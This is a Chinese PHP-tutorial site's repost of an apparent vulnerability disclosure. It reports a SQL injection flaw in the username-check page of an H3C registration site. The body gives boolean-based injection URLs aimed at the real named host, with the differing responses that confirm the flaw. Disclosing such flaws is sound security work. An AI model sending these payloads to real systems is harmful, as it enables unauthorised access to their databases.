来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 详细说明:注册页面进行用户名检验的页面,没有对输入进行过滤漏洞证明:http://rma.h3c.com/spms_outter/base/CheckRegistedOrg.do?orgname=admin 返回 帐号:admin 已被注册,请换一个用户名注册!ht...
|
详细说明:注册页面进行用户名检验的页面,没有对输入进行过滤 http://rma.h3c.com/spms_outter/base/CheckRegistedOrg.do?orgname=admin'%20and%20'a'='b 返回 "没有人注册 admin' and 'a'='b 这个帐号,您可以使用这个帐号注册。" http://rma.h3c.com/spms_outter/base/CheckRegistedOrg.do?orgname=admin'%20or%20'a'='b 返回 "帐号:admin' or 'a'='b 已经有人申请,请换一个用户名注册!。" |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
